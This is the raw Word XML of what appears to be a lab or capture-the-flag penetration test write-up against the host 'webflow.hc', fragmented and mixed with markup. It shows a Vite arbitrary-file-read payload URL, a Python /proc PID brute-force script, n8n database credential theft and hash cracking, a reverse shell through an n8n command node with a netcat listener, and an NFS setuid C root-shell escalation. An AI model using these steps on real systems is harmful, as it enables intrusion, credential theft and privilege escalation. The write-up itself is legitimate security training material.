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6qq6p0m174k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1xvt3lw6hlhf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WebFlow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support is required, please open a ticket in the support channel on the Discord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qgn06jwpyvxr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the execution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following exposed ports were identified on the target host.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03811"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="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8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Ports of interest were identified during the scanning phase, including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Ports of interest were identified during the scanning phase, including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service available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 automatic redirect to the domain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http://webflow.hc/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67287"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="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2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added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file, allowing the operating system to perform local DNS resolution during testing.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13238"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="7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application through the service running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 view the system’s initial interface.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8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DNS subdomain fuzzing process identified an additional subdomain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automation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http://webflow.hc/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FUZZ.webflow.hc"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shubs-subdomains.txt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07445"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="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44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automation.webflow.hc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identified as an instance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 workflow automation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40000"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="8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directory and file fuzzing process was also performed against the main host to identify accessible resources in the application.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http://webflow.hc/FUZZ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19664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enumeration,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package.json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 Its analysis revealed that the application uses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front-end framework, version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6.1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the identification of the version and technology in use.</w:t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78300"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="8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8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technology identified, a known vulnerability affecting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framework was confirmed, registered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CVE-2025-30208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allows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arbitrary file read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 the system.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002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Link: </w:t>
      </w:r>
      <w:hyperlink r:id="rId1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https://github.com/4xura/CVE-2025-30208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CVE-2025-30208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 was successfully validated, allowing direct exploitation in the target environment by accessing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file..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http://webflow.hc/@fs/etc/passwd?raw??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8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arbitrary file read vulnerability, it was possible to brute-force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PIDs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order to identify the full execution path of the application supporting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automation.webflow.hc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corresponding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service.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concurrent.futures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 to synchronize console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print_lock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check_process(i):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requests.get(f"http://webflow.hc/@fs/proc/{i}/cmdline?raw??",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('n8n'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r.text):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print_lock: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print(f"pid=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{i}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{r.text}")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requests.exceptions.RequestException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max_workers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ThreadPoolExecutor(max_workers=max_workers)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executor.map(check_process,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the analysis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PID 646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full execution path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service used by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automation.webflow.hc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identified. It was confirmed that the binary was being executed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appsvc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 directory, located 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/home/appsvc/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82700"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="8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identifying the correct application path, the official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 documentation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consulted, which indicates that the application uses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SQLite3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its local database for storing sensitive information, including credentials. By exploiting the arbitrary file read vulnerability, it was possible to access the database located at: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/home/appsvc/.n8n/database.sqlite.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005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20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https://docs.n8n.io/hosting/configuration/supported-databases-settings/#sqlite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reading the database, it was possible to extract the application user and password hash.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005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kilts@webflow.hc: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http://webflow.hc/@fs/home/appsvc/.n8n/database.sqlite?import&amp;raw??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09800"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="8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extracted password hash was stored in a file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65200"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="8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John the Ripper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hash was subjected to a password cracking process, successfully recovering the plaintext credential</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005C">
      <w:pPr>
        <w:spacing w:after="24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--wordlist=~/rockyou.txt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36700"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="8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obtained credentials, it was possible to successfully log in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application.</w:t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kilts@webflow.hc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P@ssw0rd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89200"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="8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Access to the application’s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administrative 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obtained.</w:t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9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also identified that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n8n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application allows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direct command execution on the operating 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through the creation of workflows.</w:t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Link: </w:t>
      </w:r>
      <w:hyperlink r:id="rId2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https://github.com/advisories/GHSA-365g-vjw2-grx8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selecting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“Create Workflow”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option in the application interface, a new automation workflow was initiated.</w:t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82900"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="9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71700"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="9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the term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“Command”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entered in the search field to locate the option that allows command execution on the operating system.</w:t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65400"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="9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 this point, a command was configured and executed within the application, enabling the triggering of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establishing remote access to the target system.</w:t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25700"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="9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On the local machine, a listener was opened using </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Netcat (nc)</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> to wait for the reverse shell connection originating from the target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-lnvp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90700"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="9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shell session was then upgraded to an interactive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more complete interaction with the compromised system.</w:t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86463" cy="2305050"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="6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23050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located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/home/appsvc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8E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14400"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="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9be9ikd34otg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Analysis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/etc/exports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revealed that the system was configured to allow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remote mounting of a partition via NFS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indicating the possibility of external access to the shared directory.</w:t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98700"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="7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this configuration, it was possible to exploit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NFS share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insert files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bit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set and owned by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user, enabling execution of binaries with elevated privileges.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malicious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 program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developed to set both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execution with superuser privileges.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&lt;unistd.h&gt;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setgid(0);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setuid(0);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system("/bin/bash");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binary was compiled locally before being transferred to the target environment.</w:t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gcc teste.c -o teste -static</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000A6">
      <w:pPr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73200"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="7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compiled binary was then transferred to the directory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/tmp/malicious/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configured as the NFS mount point, making the file accessible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of the target system.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000A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Before execution, the binary permissions were adjusted by changing ownership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chown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by setting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bit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ensuring execution with elevated privileges.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000A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/tmp/malicious/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root:root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u+s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70000"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="7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malicious binary was then executed on the target system, resulting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 escalation to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65200"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="7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B9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87400"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="7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headerReference r:id="rId41" w:type="even"/>
      <w:footerReference r:id="rId42" w:type="default"/>
      <w:footerReference r:id="rId43" w:type="first"/>
      <w:footerReference r:id="rId4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</w:t>
      <w:tab/>
      <w:tab/>
      <w:t xml:space="preserve">          </w:t>
      <w:tab/>
      <w:tab/>
      <w:tab/>
      <w:t xml:space="preserve">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>
        <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
      </w:rPr>
    </w:pPr>
    <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.hbf9me8c9mv1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4" name="image18.jpg"/>
          <a:graphic>
            <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
              <pic:pic>
                <pic:nvPicPr>
                  <pic:cNvPr id="0" name="image18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E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97" name="image23.png"/>
          <a:graphic>
            <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
              <pic:pic>
                <pic:nvPicPr>
                  <pic:cNvPr id="0" name="image2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6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WebFlow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6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2.xml"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.n8n.io/hosting/configuration/supported-databases-settings/#sqlite" TargetMode="External"/><Relationship Id="rId42" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer1.xml"/><Relationship Id="rId41" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header3.xml"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image14.png"/><Relationship Id="rId44" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer3.xml"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image12.png"/><Relationship Id="rId43" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer2.xml"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image25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ebflow.hc/" TargetMode="External"/><Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/advisories/GHSA-365g-vjw2-grx8" TargetMode="External"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image22.png"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image26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2.png"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://webflow.hc/" TargetMode="External"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image27.png"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image30.png"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image20.png"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image3.png"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image4.png"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image15.png"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image5.png"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image13.png"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image17.png"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image16.png"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image19.png"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image11.png"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image10.png"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image7.png"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/4xura/CVE-2025-30208" TargetMode="External"/><Relationship Id="rId39" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header1.xml"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image6.png"/><Relationship Id="rId38" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image8.png"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image29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3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eialprE2SEGh09+hbGvex4U4g==">CgMxLjAyDmguNnFxNnAwbTE3NGt3Mg5oLjF4dnQzbHc2aGxoZjIOaC5xZ24wNmp3cHl2eHIyDmguOWJlOWlrZDM0b3RnMg5oLmhiZjltZThjOW12MTgAciExRGtlNGdjQjVYQlRvdU5HaEdkbUEwaXl3NXNLWG5lUUY=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